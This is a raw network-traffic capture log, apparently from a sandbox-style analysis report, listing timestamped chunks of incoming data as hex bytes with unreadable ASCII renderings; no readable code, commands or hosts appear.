                                                                                    2021-11-23 13:42:43 UTC315INData Raw: 8c a4 9b a6 88 ae ec 00 9b 32 e9 ad 79 3a a9 0c 83 4b 24 4e c3 ad 64 d9 6e 0c fc 05 f9 ed 28 2f 30 19 2b 2d b4 d0 89 86 54 c7 55 bf fa 81 6c c9 a5 f5 20 86 55 98 ed 16 e5 94 2c 9d 01 c2 ad 9a 33 7d 60 3a e5 e0 6c 55 d7 de 8a 7e 82 36 d5 26 9c ce 58 88 4c 9c c9 d8 10 1c ce 6e 45 61 9f da 8a 45 9f 79 ef 6d b3 95 b6 39 22 36 3e f8 2f 94 59 51 82 aa df fe 15 7a 96 b5 20 3a 81 0b b2 89 d6 1f f4 28 33 40 28 1d d3 8e f7 22 d4 ad 3e 69 e2 89 c0 90 fd 77 6b f3 0e c1 26 c7 da 0e 16 3a df 2c 6d 85 b4 9f 10 70 7f 27 d6 f0 81 75 48 eb 34 a0 4b 2a e7 86 61 90 92 f3 33 11 88 f3 2c 85 59 7c 60 41 79 f6 f6 05 e5 db a5 1b 7d 7e 60 62 b0 20 6f a3 c8 e9 29 8d c6 ad 7f 2b 32 62 6f d6 a4 f3 9e 12 1b dc c8 6a f4 d0 13 6e c4 36 c4 37 89 34 27 05 d7 2f 48 c6 c4 9f 8f 5d 6c e8 68
                                                                                    Data Ascii: 2y:K$Ndn(/0+-TUl U,3}`:lU~6&XLnEaEym9"6>/YQz :(3@(">iwk&:,mp'uH4K*a3,Y|`Ay}~`b o)+2bojn674'/H]lh
                                                                                    2021-11-23 13:42:43 UTC316INData Raw: 4d 2f 75 fe 95 b2 90 18 7f 11 13 48 71 8a dd f2 d7 59 da c8 3f eb 89 23 f6 88 2b f2 db 44 71 a7 17 b5 5d 58 3f a8 95 c1 81 00 1e 1a 6c d6 15 2b 19 7e f4 af c5 af 83 e7 c0 2e 26 65 7a d7 14 e5 b9 ff 9e bb df be 1a 74 38 8b e8 17 4c 58 b6 b3 44 5f 13 00 63 87 63 b6 e7 33 94 39 fa 5c 41 2f 34 33 a2 45 4a 3b 8b 3d 22 3d 19 4b 52 4d cc f1 ac 45 d2 a5 d4 ba 82 bb 9a b5 c7 e2 df 0c 9e 05 3b 46 d6 05 c9 83 10 a7 42 28 a6 a1 56 8e 3f e5 db 2c c6 f9 98 a7 b0 61 e1 d3 da 10 d3 2f b6 f5 3c 2f 34 df 90 12 77 e1 83 9c 11 0a 7b f4 21 c4 ac f1 79 e0 6f ce 68 5f 3d 32 be 43 2d 7d 15 c8 3b a5 e0 f0 e2 dd 13 8b f4 9d 0f 10 9a 7e a1 c2 50 54 5a db d8 e7 c8 68 f1 ef 3c 4b e3 9b 55 25 52 d0 9e 76 ed 7a 7d 21 b2 bc 8b d1 aa 67 91 fa 71 49 ca 34 b9 95 15 b9 eb 33 ba f9 bc 54 6d
                                                                                    Data Ascii: M/uHqY?#+Dq]X?l+~.&ezt8LXD_cc39\A/43EJ;="=KRME;FB(V?,a/</4w{!yoh_=2C-};~PTZh<KU%Rvz}!gqI43Tm
                                                                                    2021-11-23 13:42:43 UTC318INData Raw: c0 cc 3c c6 fb 06 40 c6 36 c3 33 d5 35 24 24 89 3b 67 d0 d4 e9 86 7e 6d da 6c 8f 4e 1b 87 c2 41 06 2d 5f e7 2e 58 0a 25 ce 07 03 7c f1 4f 24 f4 38 24 a2 3d 65 30 b3 10 ca 36 67 80 cf 9f 79 fe 63 e9 13 25 70 45 f4 63 60 14 d0 07 38 de b7 03 02 b5 4f 5a a7 6c 7b 59 f9 e1 cf e0 be 75 3f 4d 7a 13 98 c9 58 a0 dc 4a 25 67 e6 a6 c3 9d 4d a4 bb 2e bf a2 47 a4 b8 81 77 b3 0a ff 8f b8 cc 73 39 b3 d7 eb 28 b7 50 db 0d d3 d0 1b 76 70 dc 70 50 72 c6 b6 10 60 fe 4b da 15 b4 b0 08 c9 9f 02 c2 32 a8 53 5a d6 96 6f 3f 56 ac e9 7f ec 45 89 3b 47 1c 33 d4 a8 7c fe 13 c1 09 f2 04 10 56 09 81 16 ec 91 df c4 b8 ff 4f 6c 92 38 8a fa 11 fd 66 4b 97 b2 ad 83 e4 b7 23 7a ee 9d 8c cb d3 4f 7a 35 9c 4f 95 4c a7 e4 01 36 b1 f3 df b7 06 4e 4d 23 14 20 01 25 e0 e7 1c e7 52 6b 22 f6 f1
                                                                                    Data Ascii: <@635$$;g~mlNA-_.X%|O$8$=e06gyc%pEc`8OZl{Yu?MzXJ%gM.Gws9(PvppPr`K2SZo?VE;G3|VOl8fK#zOz5OL6NM# %Rk"
                                                                                    2021-11-23 13:42:43 UTC319INData Raw: 32 20 19 8b a7 ec e4 96 61 87 e6 4f 57 cb 10 dd d3 28 90 f3 3e ec 98 c0 51 28 46 51 33 96 76 f2 d9 26 30 fa 96 6f 2c 0a 47 c4 48 38 22 99 52 49 69 03 86 b2 62 b6 ac a8 ca b1 94 c6 62 8a 36 9a 93 43 35 f4 38 c4 21 10 0f c7 ee 64 88 05 58 8f 08 d7 fd 32 32 09 22 15 4c d8 ef a2 fb 56 c6 4a 81 90 fa 14 da eb bc 62 ec 5f ca ab 46 c2 92 2f a3 03 f8 a4 95 33 03 5b 21 fd 91 46 7f ae a9 e7 16 cb 28 bd 4f 95 fe 4d e6 71 bc ff d0 15 13 ce 5f 7d 6d 90 fe a2 14 cb 7d a3 3d de de fa 0e 66 5d 47 bb 7c c7 5e 14 91 9b e0 a0 35 7a a9 cc 6b 0a c3 1f 89 90 b8 72 b2 5c 39 60 28 14 dc cd b0 54 f3 b2 0f 0e e9 a4 93 8a f3 44 52 8b 72 f1 3c 84 8f 7a 4f 4c ae 6b 73 cb df cc 5b 29 43 18 86 83 89 2d 61 cc 28 c9 05 0f 8f f1 3a bd e3 9f 69 00 cf e3 04 f6 28 1d 20 58 50 f1 8e 02 c4 e1
                                                                                    Data Ascii: 2 aOW(>Q(FQ3v&0o,GH8"RIibb6C58!dX22"LVJb_F/3[!F(OMq_}m}=f]G|^5zkr\9`(TDRr<zOLks[)C-a(:i( XP
                                                                                    2021-11-23 13:42:43 UTC320INData Raw: 09 e4 92 66 64 c1 f4 bb b0 0b 01 6b 51 26 6f 20 36 e1 b4 4f eb 40 32 0f c6 ee c5 6f 56 1a 96 cb 0c 29 65 b9 f3 8c 1c 30 ef 22 7d 53 2e 5d bf 84 14 5b 3c 6a 2f 1f 7a 18 dd d0 f0 cc 4f 09 0a 4a 56 67 b9 b3 fb f1 05 d5 b7 13 e1 da 75 91 9a 17 ed db 09 2c b4 04 f0 51 52 34 b3 87 f7 da 2c 20 04 35 91 49 33 20 2b a6 c6 9a 94 ff 9d b2 7d 76 26 4f a3 19 ed 9b f8 ad b5 fd c0 35 76 08 d2 e7 55 66 1e a7 b0 14 42 17 78 1b eb 09 b7 e1 01 a3 63 bd 6c 57 24 25 31 81 57 58 2a de 7b 40 00 73 45 32 6f b2 a6 dc 2c 82 b7 81 a0 f6 96 b4 be c1 bc aa 53 aa 61 16 55 f5 13 d8 87 13 92 32 26 de c3 11 de 65 c3 dd 23 e7 f3 e4 c6 b1 02 f7 ee f6 5d d7 32 82 84 31 26 6d d6 90 76 04 85 c7 f7 76 23 0d ca 04 95 9d 98 61 e2 60 e0 11 54 04 01 bc 5b 24 20 39 e1 30 94 a7 f5 af cb 5b 96 d8 9e
                                                                                    Data Ascii: fdkQ&o 6O@2oV)e0"}S.][<j/zOJVgu,QR4, 5I3 +}v&O5vUfBxclW$%1WX*{@sE2o,SaU2&e#]21&mvv#a`T[$ 90[
                                                                                    2021-11-23 13:42:43 UTC321INData Raw: 3a ed 52 4b 84 85 18 b9 eb a4 70 0a fa c7 4b 8f 52 2c 27 06 1c bc e0 54 dd c6 94 67 42 5f 20 56 80 14 15 81 b9 a0 1f dc ce b5 70 7c 04 15 4a 8d ca ab c8 43 18 fa 9b 70 a2 cd 1c 6e df 5f a5 2c b8 56 25 13 89 37 67 f7 bc cd 80 5d 45 dd 62 9d 45 45 8e cd 7e 3d 3d 70 c8 1b 08 01 0c fc 34 11 37 a1 55 71 ec 25 08 a3 40 7a 04 d0 66 ae 29 2e a5 ee 82 01 e2 68 e6 3c 17 40 47 86 04 36 50 95 14 12 ad 97 03 1a b1 50 7f fc 74 51 31 a0 c1 cb a4 90 6c 3f 68 7a 6b 98 dd 38 b1 fc 6d 26 4b c0 a8 c9 a1 38 e8 81 11 90 8f 68 bb 9c e8 07 c7 37 ad f6 83 b0 79 31 d6 d9 96 19 af 21 bc 50 bd de 3c 50 70 ce 70 69 77 8c d4 5f 75 87 60 f9 4c 98 b4 7b de aa 08 f9 13 87 21 58 d1 85 64 63 5b 88 c9 5b d8 59 ef 30 26 7d 3a e6 9a 33 ae 59 9a 1f eb 19 17 0f 58 8d 0f ea 98 a8 a0 e0 ec 65 40
                                                                                    Data Ascii: :RKpKR,'TgB_ Vp|JCpn_,V%7g]EbEE~==p47Uq%@zf).h<@G6PPtQ1l?hzk8m&K8h7y1!P<Pppiw_u`L{!Xdc[[Y0&}:3YXe@
                                                                                    2021-11-23 13:42:43 UTC323INData Raw: ac e1 3a ed 4f f9 64 4a 22 2c 9e 44 51 27 13 cf 09 80 a8 f9 9f bd 34 85 cf ac 7e 21 ce 58 b9 cb 70 7e 59 a9 ba a2 da 0a df b6 4f 68 84 de 24 5e 67 c1 e6 1d b6 79 51 3d 8b a1 dc 85 8e 57 81 b5 3a 26 ae 4b fd ef 26 a0 bd 4e 93 ca a6 3b 2c 64 5e 3f 99 7b c8 c7 0c 09 8f c3 6e 40 7c 29 b2 47 3e 22 a1 74 0d 19 56 ec c9 17 b4 ab a1 da 84 b3 db 73 a1 49 cb 91 66 30 f1 4d 9d 4b 55 5f b4 9f 63 c5 60 14 dd 72 cd c6 16 49 4a 2f 2b 02 b9 f8 b2 f4 65 95 30 ee e4 81 1d a1 ea e5 50 9f 38 9c fb 18 f8 98 2a a7 73 c6 85 96 00 51 6f 3d f1 e9 19 32 c9 de fb 1b d2 70 9f 4a d9 cf 5b ea 4d 8e c9 f2 37 01 c0 50 5d 63 a6 f8 bf 4a 9a 1e f1 6d c2 d8 e0 71 69 51 3d d6 33 8b 1a 71 bb a2 ef ac 54 30 9d ef 6b 77 b4 6e cd c8 c8 1f 85 7d 78 59 38 6e a2 aa de 05 d8 8c 02 6d b5 bd 91 84 95
                                                                                    Data Ascii: :OdJ",DQ'4~!Xp~YOh$^gyQ=W:&K&N;,d^?{n@|)G>"tVsIf0MKU_c`rIJ/+e0P8*sQo=2pJ[M7P]cJmqiQ=3qT0kwn}xY8nm
                                                                                    2021-11-23 13:42:43 UTC324INData Raw: 4a 77 4b 3e 81 c5 27 fb 52 e4 20 9d 24 69 39 0e 8a 17 cc cd ff cb 8b de 1b 7a a1 1f b8 9c 3d 8f 6b 24 f5 f6 90 9a eb 87 56 5a ab f7 96 a9 81 35 75 46 c9 78 fc 68 97 eb 36 6d b6 ea bb c1 69 09 6a 73 35 2f 24 02 d6 8a 1d c9 44 6d 20 da e7 b7 54 06 3d e0 b5 45 78 7b b9 82 96 77 08 cd 38 59 58 4f 1f b4 b6 16 7d 7e 72 08 4a 21 56 bf 81 b0 a0 28 7e 14 4a 27 23 d3 e6 c7 cb 7b f8 90 78 f7 e7 67 bd dd 30 c6 c3 23 3c 84 74 fc 71 08 3e c0 e2 a3 95 7b 20 2e 3e d7 14 31 2a 11 c1 d9 fd 8a ba f8 d8 3b 03 25 4f a8 3f f2 b4 a0 cf 82 a8 d9 21 6b 1b 8b c5 32 4a 1e a1 dd 73 44 45 03 59 9e 71 99 da 22 b0 2f 96 10 09 46 33 66 a2 3e 11 6e 8d 1a 46 11 38 3b 0a 47 dc d8 bb 5a c6 9f ee 97 fe 82 90 cd a9 84 cf 02 ab 67 34 65 d1 2a d4 f8 1b 8b 30 10 90 ca 21 ce 2c ea dc 5e c2 f2 b7
                                                                                    Data Ascii: JwK>'R $i9z=k$VZ5uFxh6mijs5/$Dm T=Ex{w8YXO}~rJ!V(~J'#{xg0#<tq>{ .>1*;%O?!k2JsDEYq"/F3f>nF8;GZg4e*0!,^
                                                                                    2021-11-23 13:42:43 UTC325INData Raw: 34 9f 1d a5 f5 eb 01 c9 7a 3f 7d 3b 0d 98 ae c2 19 fb d5 38 6a d7 86 fa b4 83 4a 0f af 7f e4 25 c7 9e 40 5d 4f b0 6f 56 bc 9b 82 3e 7e 53 38 f4 c0 db 46 56 9a 52 bb 0c 0c a7 f6 05 96 fb b6 05 5f e1 b0 23 a2 6d 2c 40 35 17 f9 97 58 e4 d4 c2 6b 0d 05 2e 61 b6 3e 69 e6 8d e6 78 fa b5 9d 6e 00 3e 33 75 e8 8f ec db 31 03 c8 c5 35 96 8a 7e 67 a4 36 9d 0b b1 52 2c 39 aa 23 7b cd e8 fe aa 60 69 d3 65 91 56 1c a7 fc 70 44 3d 5f da 3e 55 6f 03 bf 3a 28 2e ca 39 21 c9 1b 14 ea 71 20 77 c2 57 c2 21 26 a7 a9 a3 71 c1 34 d1 27 35 4a 74 fe 5b 01 14 99 06 3d db df 45 0f 95 65 5d a7 61 58 25 91 f2 b1 a5 f9 6b 11 6b 44 41 cb c5 24 aa c9 3a 16 05 9a be fb ad 3f a8 a9 1d 96 96 58 f4 ee e7 76 b3 3b e9 8b 86 ed 73 33 f5 b5 e2 5e c1 38 92 14 a9 fc 05 77 67 dc 4f 57 6c dc dc 3c
                                                                                    Data Ascii: 4z?};8jJ%@]OoV>~S8FVR_#m,@5Xk.a>ixn>3u15~g6R,9#{`ieVpD=_>Uo:(.9!q wW!&q4'5Jt[=Ee]aX%kkDA$:?Xv;s3^8wgOWl<
                                                                                    2021-11-23 13:42:43 UTC326INData Raw: cb 99 66 e8 02 0f 58 ee 58 d9 98 1e f5 4d 15 b2 b9 53 9b 10 e5 d3 57 d4 d3 a7 b2 ac 79 9b a6 b6 18 d5 15 e1 8e 73 38 57 e9 be 5e 43 fc f7 e2 24 0b 66 f5 02 e3 d1 dc 7b 93 14 81 0a 00 1e 2a af 7a 51 04 40 a1 24 99 ee 84 ea dd 05 a2 a4 8d 13 1c af 59 84 b1 0b 2e 17 d5 f6 f3 ce 43 fd 95 6f 47 e0 a0 26 7b 3d d2 cd 13 a3 47 7a 3b 84 a5 f2 8b e2 16 e3 b5 76 4d ee 26 c8 f8 08 e1 a0 44 a3 cb af 02 68 77 5b 36 9e 67 c2 84 0c 7d 83 af 2a 40 30 47 fe 14 36 34 8b 7e 79 66 54 fc c0 6b ac 8d a9 a7 9e a0 fa 06 af 4d 9e d7 22 30 bd 1e d6 4f 00 1a c6 95 6b e5 53 37 df 02 c7 d4 33 12 2c 4f 3d 3c f6 bf fd b5 21 95 7c 8c f7 c8 01 93 d1 c8 70 bf 27 b3 c0 24 e1 ec 1a b7 0d c7 bf 9d 7f 49 52 02 d6 bf 6f 59 b8 d3 d3 68 cc 00 98 30 fa 8d 38 e8 59 9b 84 be 5b 78 d9 53 48 6f b6 ce
                                                                                    Data Ascii: fXXMSWys8W^C$f{*zQ@$Y.CoG&{=Gz;vM&Dhw[6g}*@0G64~yfTkM"0OkS73,O=<!|p'$IRoYh08Y[xSHo
                                                                                    2021-11-23 13:42:43 UTC328INData Raw: bf c7 bd e1 43 14 d1 fc be 2a 87 05 a4 02 91 f6 3f 57 57 cf 6d 6e 66 c3 86 3c 33 c9 62 b6 33 8a bc 42 d7 a9 2e c0 18 95 10 6f c7 8d 64 21 71 94 de 60 c9 5c da 03 41 59 66 ce bc 40 a9 50 e8 2f cf 1d 45 33 2a fb 02 d3 f5 da ec be f8 5d 6a ad 21 86 c9 3f f4 3f 48 b3 85 80 a8 fb ff 21 66 cf c1 8a d7 8e 61 5b 0d 9c 7b be 50 ba bd 0b 2b ae b4 e3 b2 39 34 5c 72 28 11 09 1e df b6 45 f1 43 6d 10 ca f4 a2 68 50 3d a5 9f 45 50 46 d7 e7 c1 01 1c f4 26 4b 70 54 0c b9 91 23 7c 5d 65 1a 59 3f 55 fa dc 87 a3 17 6e 66 07 42 6e a5 f2 d1 da 4d 94 a9 39 c7 d8 75 ae 8b 2b e1 f2 1d 30 8b 05 e9 3b 33 3c 9a 9c cf d9 35 34 03 31 dd 26 1b 1a 26 f5 d9 cf b2 a0 d5 c0 3d 2e 12 54 90 21 e9 b2 f9 a0 e7 f8 8b 25 43 2a 85 9f 30 64 16 aa e8 40 41 4f 36 74 bd 46 a5 eb 72 d8 75 a4 46 66 23
                                                                                    Data Ascii: C*?WWmnf<3b3B.od!q`\AYf@P/E3*]j!??H!fa[{P+94\r(ECmhP=EPF&KpT#|]eY?UnfBnM9u+0;3<541&&=.T!%C*0d@AO6tFruFf#
                                                                                    2021-11-23 13:42:43 UTC329INData Raw: 5c 57 89 96 fe 34 d1 20 ad 01 db 9b 03 b9 6c a7 b9 fd 17 35 d1 2a 4b 6f ae c7 c8 18 d7 41 97 21 c6 d7 e7 21 65 19 7a fc 3a 8e 6c 51 92 89 d8 f8 20 3d a8 f1 33 21 80 27 95 bb eb 76 9b 49 77 45 3a 68 93 bf f2 10 82 a2 2c 2f c4 89 d7 83 b6 21 4d a1 3e d7 1b f6 e7 40 73 6d bd 16 47 8f e2 8f 0a 71 53 27 c7 f0 dc 7c 7d de 22 ec 5e 0f de 95 24 96 c1 bd 55 5d c7 ef 35 a2 7b 7c 6f 27 4d d3 a0 02 ac d0 9a 22 52 67 66 64 80 08 41 a1 86 bc 29 fd 97 b9 59 3e 74 37 7e c4 a8 ee 93 1b 0a ec 8c 69 f4 c5 26 46 f0 66 9d 5e 85 66 19 3c a7 3b 4c e7 ee c5 bd 52 47 f7 46 b8 50 1f a4 f1 07 01 11 7c cf 2b 43 2b 2b e1 18 01 4e c8 04 29 fe 38 2e a5 08 03 39 d6 47 a8 11 72 bc ff c0 66 fa 66 d7 12 7a 72 73 cf 66 63 27 ee 5d 4a a1 87 31 03 ad 76 59 ab 62 39 53 ab dd ec f4 9a 51 5d 49
                                                                                    Data Ascii: \W4 l5*KoA!!ez:lQ =3!'vIwE:h,/!M>@smGqS'|}"^$U]5{|o'M"RgfdA)Y>t7~i&Ff^f<;LRGFP|+C++N)8.9Grffzrsfc']J1vYb9SQ]I
                                                                                    2021-11-23 13:42:43 UTC330INData Raw: 60 a9 4d d9 13 50 32 ad a8 44 d6 53 0c de 54 c5 d2 70 2c 08 14 29 7a e6 e7 b4 ea 46 c9 74 ee 90 ce 05 9e fd c8 7c bf 07 ca dc 14 ff ba 30 88 03 e0 bc ba 19 4f 67 25 de b3 24 5d 9a bc d9 28 dd 33 9e 13 cb 8a 07 b4 6e de de db 0c 1a fc 45 65 6b b0 e5 a1 1b cb 77 a1 35 d0 d9 e5 2c 62 60 29 d3 30 8d 2f 63 84 89 f4 f4 0d 25 b5 ed 3d 02 86 20 95 a5 89 4e 8d 0b 69 54 2b 76 a0 be e0 0c ef 87 25 22 86 b7 c6 92 8b 40 53 a1 4a ef 37 d4 b8 75 63 75 8e 13 43 9b 87 cc 3f 71 46 03 d7 d6 d5 76 6c ec 37 e1 65 12 b5 a4 38 f7 ee aa 57 60 d4 ec 14 ae 15 7a 66 11 7e e9 ad 00 cf cc 9b 33 0d 61 76 64 a9 3c 4c b9 90 d4 6e cb 8f 91 59 3a 1c 3f 7f b0 90 ce 9f 21 2d fc 9b 64 f7 db 2a 78 f6 46 8c 2e 87 03 0a 06 90 11 73 f0 ff ca ad 77 5a e4 77 b4 4f 15 b8 88 40 17 00 45 f1 12 45 3f
                                                                                    Data Ascii: `MP2DSTp,)zFt|0Og%$](3nEekw5,b`)0/c%= NiT+v%"@SJ7ucuC?qFvl7e8W`zf~3avd<LnY:?!-d*xF.swZwO@EE?
                                                                                    2021-11-23 13:42:43 UTC331INData Raw: f6 94 ae 8c 35 97 db 5c a1 8d 20 cb ea 52 b3 95 63 c4 fe 44 97 29 e1 ec f8 ff a3 a4 c7 41 4e 74 a5 27 4f f2 58 96 9b ab c0 d1 a0 ac 5e 4c 67 2d 91 6c 96 cd 9d f6 a2 8a e6 4c 32 69 e0 97 66 2d 6c dd 05 cb 10 0a 45 15 ca 32 c4 88 72 95 1b d6 ad f8 43 10 5a d2 6e 3d 5e bd 4a 10 69 44 0c 74 bf ae 99 da 01 bc c0 ab c0 ce d8 d2 f1 85 05 cd 31 c8 64 49 34 b9 7d 9f d1 78 dd 7f 72 c3 ff 10 ef 6c b6 92 1b 82 e9 d1 d1 e7 26 c7 a3 b5 27 a5 7b ae df 21 5d 12 0e ea 29 2b c1 db d2 6b 53 43 ab f0 83 ec 8b 0d af 27 85 2f 2c ef 8b fc 28 7a 4a 75 91 7d a2 99 ce bd ad 65 e1 8e e9 4e 71 e8 2b e2 0d 17 20 31 c8 85 a3 f7 30 aa fe 19 07 b7 ea 4d 03 04 88 83 49 d3 2b 18 4d e1 f5 b2 b4 d1 11 e0 8b 06 28 8f 6b 90 a5 77 ce 96 81 3c 9e e3 6f 58 00 38 54 d6 1f 90 b1 cd 94 b0 a9 09 7e
                                                                                    Data Ascii: 5\ RcD)ANt'OX^Lg-lL2if-lE2rCZn=^JiDt1dI4}xrl&'{!])+kSC'/,(zJu}eNq+ 10MI+M(kw<oX8T~
                                                                                    2021-11-23 13:42:43 UTC332INData Raw: 6c 63 e5 4f 3f 97 8a a8 c8 12 2f 80 22 dd 25 77 d7 80 03 74 66 88 68 78 2a 4b c0 74 72 60 18 21 86 48 9b 5e c1 33 75 05 58 32 33 f3 41 05 4e 75 c4 33 9c 87 51 62 7c 07 97 bf 3a 30 61 88 61 4c f4 63 d8 52 df 03 35 c3 18 2b 80 57 a9 86 87 78 85 59 0c 3b a2 1a ac 06 e0 84 83 a7 27 ba ca a5 c8 79 91 dc ff 40 ff 24 ca db d3 27 e5 0b ce 32 31 8e 0c 7b 83 9a 5f a2 e4 25 e2 66 f7 35 ba 23 05 ab 02 08 b6 55 ef 7f 57 bb 03 37 7c fc f9 2d 86 c9 c1 4b 7b c6 62 6e 96 61 ff 54 34 dd be 1c 2c 34 bb 23 10 3e 23 b9 e5 05 c7 31 8c 4f 99 74 34 d7 b7 bf 47 a7 a2 ae a3 dd 80 3c 98 7d 4b c7 af 5b af 44 a5 4f c2 c1 c6 9f f1 68 0f 8e 25 67 99 c0 05 35 6d 70 83 cd 3f f5 d2 5a 4b 40 66 81 e1 48 35 07 05 dd ef 6b 4c b2 d2 34 bb 29 0f 70 89 81 f0 10 36 42 f7 f4 2c 3b c7 1d 8c a7 cb
                                                                                    Data Ascii: lcO?/"%wtfhx*Ktr`!H^3uX23ANu3Qb|:0aaLcR5+WxY;'y@$'21{_%f5#UW7|-K{bnaT4,4#>#1Ot4G<}K[DOh%g5mp?ZK@fH5kL4)p6B,;
                                                                                    2021-11-23 13:42:43 UTC334INData Raw: 90 73 86 b2 f0 be 8c 09 f1 9b e2 62 48 8f 59 4f 51 7e 94 a0 4f 4a b4 a5 18 7a 44 38 11 ae 5e d6 3c 0a bf 31 2c 07 fc 4e 47 11 e7 b2 f2 f5 0c 58 c2 77 a7 d9 13 8c a9 5f 3f 1b 26 6b fe df 2d bb 36 5a a6 32 a2 a5 f1 1d 78 73 56 fb ec 85 c7 b6 0c a6 1f 6f aa b1 6b ed 85 81 1d d9 6a d7 8d 69 32 b8 56 e8 67 82 c0 c2 4f 33 1d 49 b7 d5 36 b3 87 ea aa 59 be 55 6e af b4 f6 66 d0 00 dc ab 3e a9 57 28 fb 03 8a 0d ad e8 75 a5 16 da 55 b4 b4 97 5a 5d 67 6f a9 df 63 2d 2a fd f7 b0 97 7d 5c ce 03 c3 41 fb 4f f9 cf ea 37 e6 8b 97 33 51 35 e6 ed 91 68 91 e5 5a 5a 8c f7 a1 e4 d0 33 be 5d 48 86 4e 99 e0 34 0b 0c f3 dd 87 f4 ec d0 6d 05 b2 ce a0 ba a5 0a 1d 27 fb 99 24 6c 5e 64 54 f9 b3 db 21 b2 2c 80 7d d7 00 0c 83 c0 23 b2 df 7c bd 23 5a 54 03 3a 06 01 6f eb 2f da e9 d8 3c
                                                                                    Data Ascii: sbHYOQ~OJzD8^<1,NGXw_?&k-6Z2xsVokji2VgO3I6YUnf>W(uUZ]goc-*}\AO73Q5hZZ3]HN4m'$l^dT!,}#|#ZT:o/<
                                                                                    2021-11-23 13:42:43 UTC335INData Raw: 52 48 ec 8c b9 d4 2b af a1 cb 64 28 94 fa 0a 37 5a e3 e7 b1 e5 54 05 9b bb 40 7e 82 5a 1a 0e 9a 77 dd e9 5c 00 09 03 6b 18 5f bd 97 ab 81 f6 70 07 38 f7 ee 07 e9 95 b5 9a 24 15 da 58 a7 88 1d ce ec 55 b0 81 41 57 6f 59 9f 29 e0 40 e8 ce 23 1b 47 43 78 5c b9 28 54 73 4b 8c 85 a4 cf de 21 cb 5b 4b 55 2d 9e 6f 99 d4 95 ef 87 9e f6 d0 98 48 fc 91 6d 18 7d 4f 22 24 1d 36 57 9a d1 3c db 9b 63 14 bf c5 23 28 4b 17 5c ce 76 3c 46 b5 45 0d 79 c1 13 6d 36 88 99 cd 8f 76 d7 3b 1d cc f8 d3 e1 16 6d fd bf 13 41 c1 fd b8 40 9a c1 7e c7 7b 7e f0 fe 17 ec db af bc 15 81 37 e0 e0 64 09 b7 25 ac 34 27 26 b3 d1 00 4f 81 97 c9 20 3b b6 d6 55 6a 5a 45 bd 7f a8 e2 ba 8d 8f 20 86 2c 33 65 4c f5 3f e6 6e 71 90 6c e9 94 d9 2e c9 6f e0 98 c9 4c 5b e4 3b 72 ad 3e 29 30 e2 89 b3 78
                                                                                    Data Ascii: RH+d(7ZT@~Zw\k_p8$XUAWoY)@#GCx\(TsK![KU-oHm}O"$6W<c#(K\v<FEym6v;mA@~{~7d%4'&O ;UjZE ,3eL?nql.oL[;r>)0x
                                                                                    2021-11-23 13:42:43 UTC336INData Raw: 33 72 d6 10 15 16 77 a0 a9 c2 7b 2d 16 f4 76 0c 27 06 02 6e 5b 2c c6 74 61 22 a9 f8 ce bd d7 66 d1 02 a2 76 af ff 79 6f 84 ea 89 0f bb c2 8f 83 93 ec 56 ff 11 ec fa f6 cf 3a 93 8b aa db 97 8f 8b 30 dc 22 62 57 11 15 f3 6d 00 8d 6e ad c0 52 08 8e 74 8b a5 7e 4b 9f 5e c0 ce 63 82 4e bf 13 f4 46 06 4f 38 d1 b4 4b 16 24 cb 7f 35 14 ba 3b 3e 75 88 64 4b f4 63 ec 56 f9 05 31 d7 84 ac 07 ee ac 82 87 78 81 58 0d 28 31 2f 48 0b f2 95 11 97 3f b5 4f 53 fa fd 94 d8 79 f9 ff 3e 43 c0 c4 86 5d 18 5d b2 db 08 d8 68 02 60 c3 4c 63 01 e6 47 e5 a4 cb 98 20 8a 03 0b b7 08 ea 55 57 bf 18 a6 7d f8 d8 3c 9a c5 41 ab 76 e1 66 67 8c e9 19 d2 f0 ce 3e 0a a4 37 bc 11 91 35 1f ae 44 00 c3 24 af 42 b1 68 23 56 2b a1 62 af af af 87 df 9f 3c 99 18 5e 67 5e 43 b5 51 31 c4 4b 48 c4 8c
                                                                                    Data Ascii: 3rw{-v'n[,ta"fvyoV:0"bWmnRt~K^cNFO8K$5;>udKcV1xX(1/H?OSy>C]]h`LcG UW}<Avfg>75D$Bh#V+b<^g^CQ1KH
                                                                                    2021-11-23 13:42:43 UTC337INData Raw: 1d 97 4e 7f e3 8c fb 93 3c 3e cd 93 bb a3 b3 f5 38 f2 96 ec 49 b4 21 18 1a 36 45 93 72 e8 d4 b1 7e ca 22 f5 53 81 66 54 4e 6d 35 17 4b f1 24 d2 e9 c8 38 82 2b e2 71 48 8a b5 50 97 18 72 c1 0b 8a 11 e2 56 66 49 a3 b8 e2 9d 0b 0c d4 64 22 7f c5 97 55 9c 60 29 a4 83 ba 1e 9f 4f 2a 72 6e 40 e2 65 05 fb 8a b3 e9 ff 27 a7 56 76 27 8d aa 89 2d a6 ad 47 fd 0f 11 b7 72 b2 05 3f 40 85 73 f0 61 32 90 3f 29 8e 83 e1 6e c8 b7 83 0e d2 7e f5 3d 9a 7f bc 9a 90 0d 93 b7 72 6a df 59 70 d7 96 44 4c 4f d3 fa 9f e6 b3 21 1b 13 3c ee 37 42 29 00 f3 da ca 69 6a d9 18 cc 87 77 8e ba f6 62 04 df ee 2e 38 f5 73 b9 02 3c ca fb 17 d0 b6 5c a6 da 10 24 ac 1f 1f 31 9e f8 1f cf a9 47 03 10 51 ba e5 43 ee cd 30 26 b9 aa 8c a5 1b 4c 25 a9 ae b3 53 62 4a 95 86 61 11 9f 9a 71 24 30 5e dc
                                                                                    Data Ascii: N<>8I!6Er~"SfTNm5K$8+qHPrVfId"U`)O*rn@e'Vv'-Gr?@sa2?)n~=rjYpDLO!<7B)ijwb.8s<\$1GQC0&L%SbJaq$0^
                                                                                    2021-11-23 13:42:43 UTC339INData Raw: d5 ba 62 a4 06 63 36 08 d4 e6 bd a1 1a b1 42 bf cd 6e f4 48 12 d7 5e 50 d7 6f 56 ab 9e 75 29 b8 eb 09 4b 64 4c 70 6f fc 08 98 fc 4d af 7a 93 77 93 be 99 71 62 ad 27 35 f3 ca e1 01 3f de cf 62 3b e1 d2 50 12 64 90 99 04 ec bc 68 c4 65 08 c6 d5 43 10 07 ff d6 59 6c e6 fb 10 f4 b9 2c 45 c8 50 1a ef 03 a2 21 65 e4 bf bd 8d d2 65 b6 86 5a d7 69 2a 4d 97 5e 85 3d 0d e3 0e ce 0e e1 5b 7d dd 24 96 08 4b e6 e6 21 64 a3 79 8b ee 9f a7 3d 87 66 b7 49 7b 46 cb ee af 91 76 19 fa 1f c5 e2 58 e7 ad 6d 3b 63 18 c2 43 52 7c 54 da 43 72 c6 f4 49 f5 8b fe 30 2e 5e 38 e8 bd b5 d5 35 b7 04 